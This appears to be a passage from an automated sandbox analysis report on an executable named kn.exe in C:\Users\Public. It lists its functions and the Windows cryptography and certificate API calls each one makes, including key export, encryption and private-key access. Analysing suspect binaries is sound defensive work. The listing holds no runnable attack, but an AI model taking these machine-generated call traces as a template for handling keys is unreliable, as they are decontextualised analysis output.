                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B1700C BCryptEnumAlgorithms,#360,12_2_00007FF627B1700C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A57034 #357,CertCreateCertificateContext,#357,CertDuplicateCertificateContext,CertCreateCertificateContext,CertCompareCertificateName,CryptVerifyCertificateSignature,GetLastError,#357,#357,CertFreeCertificateContext,LocalFree,CertFreeCertificateContext,12_2_00007FF627A57034
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A5302F #357,LocalFree,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,12_2_00007FF627A5302F
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD9028 #357,#357,CryptMsgClose,CryptMsgClose,CertCloseStore,LocalFree,12_2_00007FF627AD9028
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE7020 NCryptDecrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptEncrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,12_2_00007FF627AE7020
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE301C CryptGenKey,#205,GetLastError,#357,#357,#357,SetLastError,12_2_00007FF627AE301C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD0F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,12_2_00007FF627AD0F58
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC4F50 CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,#357,LocalFree,12_2_00007FF627AC4F50
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B16FAC BCryptOpenAlgorithmProvider,#360,12_2_00007FF627B16FAC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE0FB4 NCryptOpenKey,#205,#359,#357,#357,12_2_00007FF627AE0FB4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A74F90 LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,#357,strcmp,GetLastError,#357,CryptMsgGetAndVerifySigner,CryptVerifyDetachedMessageSignature,GetLastError,#357,CertEnumCertificatesInStore,memcmp,#357,CertFreeCertificateContext,#357,#357,CertFreeCertificateContext,strcmp,#357,CryptMsgControl,GetLastError,#357,#357,#357,#357,12_2_00007FF627A74F90
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0EF74 GetLastError,#357,CryptDecodeObject,GetLastError,GetLastError,GetLastError,LocalAlloc,memmove,LocalFree,LocalFree,LocalFree,12_2_00007FF627B0EF74
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE0EF4 NCryptImportKey,#205,#359,#359,#357,12_2_00007FF627AE0EF4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B16F2C NCryptExportKey,#360,12_2_00007FF627B16F2C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A78F1C strcmp,LocalFree,strcmp,LocalFree,strcmp,LocalFree,strcmp,CryptDecodeObject,LocalFree,LocalFree,LocalFree,strcmp,strcmp,strcmp,strcmp,LocalFree,GetLastError,#357,GetLastError,GetLastError,12_2_00007FF627A78F1C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B40ED0 LocalAlloc,LocalReAlloc,#357,#360,CryptFindOIDInfo,CryptFindOIDInfo,LocalAlloc,#357,memmove,_wcsnicmp,#256,#359,12_2_00007FF627B40ED0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE2E6C CryptFindOIDInfo,#205,#357,#357,#357,#359,#359,#357,#357,#359,LocalFree,12_2_00007FF627AE2E6C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0EE94 CryptSignMessage,SetLastError,12_2_00007FF627B0EE94
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B16EA8 NCryptImportKey,#360,12_2_00007FF627B16EA8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B16E48 NCryptSetProperty,#360,12_2_00007FF627B16E48
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B24E58 NCryptIsKeyHandle,#357,BCryptGenRandom,#360,LocalAlloc,CryptExportPKCS8,GetLastError,LocalAlloc,CryptExportPKCS8,GetLastError,NCryptIsKeyHandle,#359,#359,NCryptFinalizeKey,#360,12_2_00007FF627B24E58
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A80E94 GetLastError,#359,CryptGetProvParam,LocalFree,#357,LocalFree,CryptReleaseContext,12_2_00007FF627A80E94
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AB2E7C #223,GetLastError,#358,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,LocalFree,12_2_00007FF627AB2E7C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC4DDC GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,12_2_00007FF627AC4DDC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE0DD4 NCryptGetProperty,#205,#359,#357,#359,#357,12_2_00007FF627AE0DD4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B30DB8 CryptMsgGetParam,GetLastError,#357,#357,memset,CryptMsgGetParam,GetLastError,#357,12_2_00007FF627B30DB8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A70E24 #357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,GetLastError,#357,#357,#357,GetLastError,GetLastError,GetLastError,CryptDecodeObject,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,12_2_00007FF627A70E24
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B08DD0 CertGetCRLContextProperty,GetLastError,#357,memcmp,CertGetCRLContextProperty,GetLastError,#357,memcmp,CertFindExtension,GetLastError,memcmp,CryptHashCertificate,GetLastError,memcmp,CryptHashPublicKeyInfo,GetLastError,memcmp,LocalFree,12_2_00007FF627B08DD0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B16DE0 NCryptCreatePersistedKey,#360,12_2_00007FF627B16DE0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B16D78 NCryptOpenKey,#360,12_2_00007FF627B16D78
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B12DAC #357,#357,CryptFindOIDInfo,LocalFree,12_2_00007FF627B12DAC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE0D84 NCryptFreeObject,#205,#357,12_2_00007FF627AE0D84
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE2D78 CryptEncrypt,#205,GetLastError,#357,#357,#357,#357,SetLastError,12_2_00007FF627AE2D78
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA4CC0 #357,lstrcmpW,CryptEnumKeyIdentifierProperties,GetLastError,#357,LocalFree,#357,#359,LocalFree,LocalFree,free,12_2_00007FF627AA4CC0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B16D2C NCryptFreeBuffer,#360,12_2_00007FF627B16D2C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA2D18 #359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,12_2_00007FF627AA2D18
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE0D14 NCryptFinalizeKey,#205,#357,#357,12_2_00007FF627AE0D14
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B16CE0 NCryptEnumStorageProviders,#360,12_2_00007FF627B16CE0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE2CFC CryptDestroyKey,#205,GetLastError,#357,SetLastError,12_2_00007FF627AE2CFC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B38CF4 GetLastError,#360,CryptGetProvParam,GetLastError,#360,#359,LocalAlloc,CryptGetProvParam,GetLastError,#357,LocalFree,CryptReleaseContext,GetLastError,LocalAlloc,CryptGetProvParam,GetLastError,#358,LocalFree,LocalFree,#357,CryptReleaseContext,LocalFree,12_2_00007FF627B38CF4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD2CF8 memset,#358,#357,CryptAcquireContextW,GetLastError,#357,#357,#358,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,DeleteFileW,LocalFree,#357,#357,#359,#359,LocalFree,LocalFree,#357,#357,#357,#357,#357,#359,#359,#359,#359,LocalFree,#359,#359,#357,12_2_00007FF627AD2CF8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B24C80 CryptAcquireContextW,GetLastError,#357,CryptGenRandom,GetLastError,CryptGenRandom,GetLastError,memset,CryptReleaseContext,12_2_00007FF627B24C80
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B16C88 NCryptEnumAlgorithms,#360,12_2_00007FF627B16C88
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A46C4C CryptFindOIDInfo,#357,#357,#359,CryptFindOIDInfo,#357,LocalFree,12_2_00007FF627A46C4C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE0C3C NCryptExportKey,#205,#359,#359,#357,12_2_00007FF627AE0C3C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AEACAC CryptContextAddRef,CryptDuplicateKey,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,??3@YAXPEAX@Z,12_2_00007FF627AEACAC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD4CA0 CryptAcquireCertificatePrivateKey,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CryptGetUserKey,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,12_2_00007FF627AD4CA0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B18C58 #357,LocalAlloc,#357,memmove,memset,BCryptFreeBuffer,#357,#357,#360,#359,#359,#359,LocalAlloc,memmove,LocalAlloc,memmove,#357,#357,CryptGetDefaultProviderW,LocalAlloc,CryptGetDefaultProviderW,GetLastError,#357,#357,#357,LocalFree,LocalFree,12_2_00007FF627B18C58
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE2C80 CryptDestroyHash,#205,GetLastError,#357,SetLastError,12_2_00007FF627AE2C80
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE2BC0 CryptCreateHash,#205,GetLastError,#357,#357,#357,SetLastError,12_2_00007FF627AE2BC0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B16C30 NCryptOpenStorageProvider,#360,12_2_00007FF627B16C30
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A7CC24 CryptDecodeObjectEx,#359,BCryptSetProperty,BCryptGetProperty,#357,BCryptDestroyKey,BCryptCloseAlgorithmProvider,12_2_00007FF627A7CC24
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B10BF4 CryptDuplicateHash,GetLastError,#357,CryptGetHashParam,GetLastError,#203,CryptDestroyHash,12_2_00007FF627B10BF4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B10B9C CryptHashData,GetLastError,#357,12_2_00007FF627B10B9C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0CBB4 CryptGetProvParam,GetLastError,#358,LocalAlloc,#357,CryptGetProvParam,GetLastError,#357,LocalFree,12_2_00007FF627B0CBB4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B4EB38 CryptDecodeObjectEx,GetLastError,??3@YAXPEAX@Z,LocalFree,12_2_00007FF627B4EB38
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6CB98 NCryptIsKeyHandle,GetLastError,#358,#360,NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#359,LocalFree,NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,CryptGetKeyParam,GetLastError,#359,CryptDestroyKey,NCryptIsKeyHandle,#359,NCryptIsKeyHandle,12_2_00007FF627A6CB98
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE0B80 NCryptCreatePersistedKey,#205,#359,#359,#357,12_2_00007FF627AE0B80
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE2AE4 CryptAcquireContextW,#205,GetLastError,#359,#357,#359,SetLastError,12_2_00007FF627AE2AE4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE0ABC BCryptVerifySignature,#205,#357,#357,#357,#357,12_2_00007FF627AE0ABC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD8AFC #357,CertCreateCertificateContext,GetLastError,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,CertSetCTLContextProperty,GetLastError,#357,#357,CertCloseStore,CertFreeCertificateContext,12_2_00007FF627AD8AFC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A82B00 BCryptEnumContexts,#360,BCryptQueryContextConfiguration,#360,#357,BCryptFreeBuffer,#357,BCryptEnumContextFunctions,#360,#360,BCryptFreeBuffer,#358,#358,#357,BCryptFreeBuffer,12_2_00007FF627A82B00
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B12A78 #357,CryptAcquireCertificatePrivateKey,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,#359,#359,12_2_00007FF627B12A78
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE8AA0 _CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptHashData,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,12_2_00007FF627AE8AA0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A56A84 LocalAlloc,#357,memmove,CryptHashCertificate2,GetLastError,LocalAlloc,#357,memmove,LocalFree,12_2_00007FF627A56A84
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACEA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,12_2_00007FF627ACEA7C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AAE9F0 IsDlgButtonChecked,memset,SendMessageW,LocalFree,GetDlgItemTextW,GetDlgItem,GetDlgItem,EnableWindow,LocalFree,#357,#357,CertFreeCertificateContext,CertFreeCTLContext,GetDlgItem,SendMessageW,SetDlgItemTextW,MessageBoxW,GetDlgItem,SendMessageW,GetDlgItemInt,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,#357,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetDlgItemTextW,SendDlgItemMessageA,CheckDlgButton,GetDlgItem,EnableWindow,SetDlgItemInt,CheckDlgButton,SetDlgItemTextW,SetDlgItemTextW,CertFreeCTLContext,CertFreeCertificateContext,??3@YAXPEAX@Z,memset,SendMessageW,MessageBoxW,memset,CryptUIDlgViewCRLW,memset,CryptUIDlgViewCertificateW,12_2_00007FF627AAE9F0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC4A34 CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptHashCertificate2,CryptEncodeObjectEx,GetLastError,CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,GetLastError,GetLastError,#357,LocalFree,12_2_00007FF627AC4A34
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE4A1C NCryptIsKeyHandle,_wcsicmp,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,12_2_00007FF627AE4A1C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE0A18 BCryptSetProperty,#205,#359,#357,#357,12_2_00007FF627AE0A18
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACAA00 memset,memset,#357,#357,#357,#357,CryptEncodeObjectEx,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,#359,LocalFree,LocalFree,12_2_00007FF627ACAA00
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B1A9F0 strcmp,GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,#357,#357,NCryptIsAlgSupported,#360,#357,LocalAlloc,memmove,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,LocalFree,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,12_2_00007FF627B1A9F0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6C960 LocalAlloc,CryptGetKeyIdentifierProperty,GetLastError,#357,LocalFree,LocalFree,12_2_00007FF627A6C960
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B12994 CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,12_2_00007FF627B12994
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE8940 BCryptFinishHash,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,12_2_00007FF627AE8940
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AEC940 _CxxThrowException,GetLastError,_CxxThrowException,memmove,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,CryptHashData,#205,GetLastError,#357,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,12_2_00007FF627AEC940
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA29A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,12_2_00007FF627AA29A0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE099C BCryptOpenAlgorithmProvider,#205,#359,#359,12_2_00007FF627AE099C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AB18DC CertFindExtension,CryptDecodeObject,GetLastError,#357,12_2_00007FF627AB18DC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0F918 CryptEncrypt,GetLastError,LocalFree,LocalAlloc,#357,LocalFree,12_2_00007FF627B0F918
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACB8D0 I_CryptGetLruEntryData,#357,12_2_00007FF627ACB8D0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A63918 #357,#357,#357,#357,CertFindExtension,CryptDecodeObject,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,12_2_00007FF627A63918
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE391C CryptVerifySignatureW,#205,GetLastError,#357,#359,#357,SetLastError,12_2_00007FF627AE391C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A538FC RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,12_2_00007FF627A538FC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE3860 CryptSetProvParam,#205,GetLastError,#357,#357,#357,SetLastError,12_2_00007FF627AE3860
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACD850 #357,Sleep,BCryptCloseAlgorithmProvider,I_CryptFreeLruCache,12_2_00007FF627ACD850
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,12_2_00007FF627AD184C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B198B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,12_2_00007FF627B198B0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A77884 GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,12_2_00007FF627A77884
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AB9878 strcmp,strcmp,strcmp,#357,#357,CompareFileTime,LocalFree,CryptMsgClose,CertCloseStore,CompareFileTime,#357,#357,12_2_00007FF627AB9878
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0F7FC CryptExportKey,GetLastError,#357,LocalAlloc,CryptExportKey,GetLastError,LocalFree,12_2_00007FF627B0F7FC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AF97E4 LoadCursorW,SetCursor,#210,LoadCursorW,SetCursor,#357,EnableWindow,SetWindowLongPtrW,SetWindowLongPtrW,SetWindowLongPtrW,GetDlgItem,SetWindowTextW,GetDlgItem,ShowWindow,CryptUIDlgFreeCAContext,LocalFree,12_2_00007FF627AF97E4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A817D4 #357,#359,#357,NCryptFinalizeKey,#360,#359,#359,#357,NCryptDeleteKey,#360,#359,#359,#359,LocalFree,LocalFree,12_2_00007FF627A817D4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A7F810 #223,CryptDecodeObjectEx,GetLastError,CertFindAttribute,CertFindAttribute,GetLastError,#357,LocalFree,LocalFree,12_2_00007FF627A7F810
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACB808 I_CryptFindLruEntry,I_CryptGetLruEntryData,#357,I_CryptReleaseLruEntry,12_2_00007FF627ACB808
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AAF774 CertFindExtension,#357,CryptVerifyCertificateSignature,GetLastError,GetLastError,memmove,LocalFree,12_2_00007FF627AAF774
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE5768 NCryptIsKeyHandle,??_V@YAXPEAX@Z,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,12_2_00007FF627AE5768
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE37A4 CryptSetKeyParam,#205,GetLastError,#357,#357,#357,SetLastError,12_2_00007FF627AE37A4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0D750 LocalAlloc,CryptFormatObject,GetLastError,#358,#358,LocalFree,#357,12_2_00007FF627B0D750
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AFB794 CryptExportPublicKeyInfoEx,SetLastError,12_2_00007FF627AFB794
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A5B788 #140,iswdigit,CryptDecodeObject,GetLastError,#357,#357,#224,12_2_00007FF627A5B788
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A7D790 SslEnumProtocolProviders,#357,SslOpenProvider,SslFreeBuffer,SslFreeObject,SslFreeBuffer,#359,LocalAlloc,BCryptGetProperty,CryptFindOIDInfo,BCryptDestroyKey,BCryptDestroyKey,LocalFree,12_2_00007FF627A7D790
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AB577C #360,#358,CryptDecodeObject,GetLastError,#357,12_2_00007FF627AB577C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE36E8 CryptSetHashParam,#205,GetLastError,#357,#357,#357,SetLastError,12_2_00007FF627AE36E8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACF6D8 #357,CryptDuplicateKey,GetLastError,CryptEncrypt,GetLastError,LocalAlloc,memmove,CryptEncrypt,GetLastError,LocalAlloc,CryptDestroyKey,LocalFree,12_2_00007FF627ACF6D8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AB366C CryptVerifyCertificateSignature,GetLastError,CryptVerifyCertificateSignatureEx,GetLastError,#357,12_2_00007FF627AB366C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B09688 CryptFindOIDInfo,#357,#360,#360,#360,12_2_00007FF627B09688
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACB664 I_CryptFindLruEntry,I_CryptGetLruEntryData,I_CryptReleaseLruEntry,12_2_00007FF627ACB664
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A55664 #256,#357,CryptHashCertificate2,GetLastError,#254,#254,#357,#207,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,#359,12_2_00007FF627A55664
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6D660 GetDesktopWindow,LocalFree,#357,CertDuplicateCertificateContext,GetLastError,#357,#357,#357,#357,#357,#207,LocalFree,#358,#357,#358,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,12_2_00007FF627A6D660
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE3654 CryptReleaseContext,#205,GetLastError,#357,#357,SetLastError,12_2_00007FF627AE3654
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ADF644 NCryptDeleteKey,#205,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,12_2_00007FF627ADF644
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A976B0 #359,CryptAcquireCertificatePrivateKey,GetLastError,#357,#358,#359,#358,#358,LocalFree,LocalFree,#357,CryptFindCertificateKeyProvInfo,GetLastError,#357,LocalFree,LocalFree,CryptReleaseContext,12_2_00007FF627A976B0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AFD6A0 CertOpenStore,GetLastError,#357,CryptMsgOpenToDecode,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,#357,LocalFree,LocalAlloc,#357,memmove,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgClose,CertCloseStore,LocalFree,LocalFree,12_2_00007FF627AFD6A0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0F650 CryptHashCertificate2,SetLastError,12_2_00007FF627B0F650
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA55F0 #357,#360,GetLastError,#360,#359,NCryptDeleteKey,#360,#357,LocalFree,LocalFree,12_2_00007FF627AA55F0
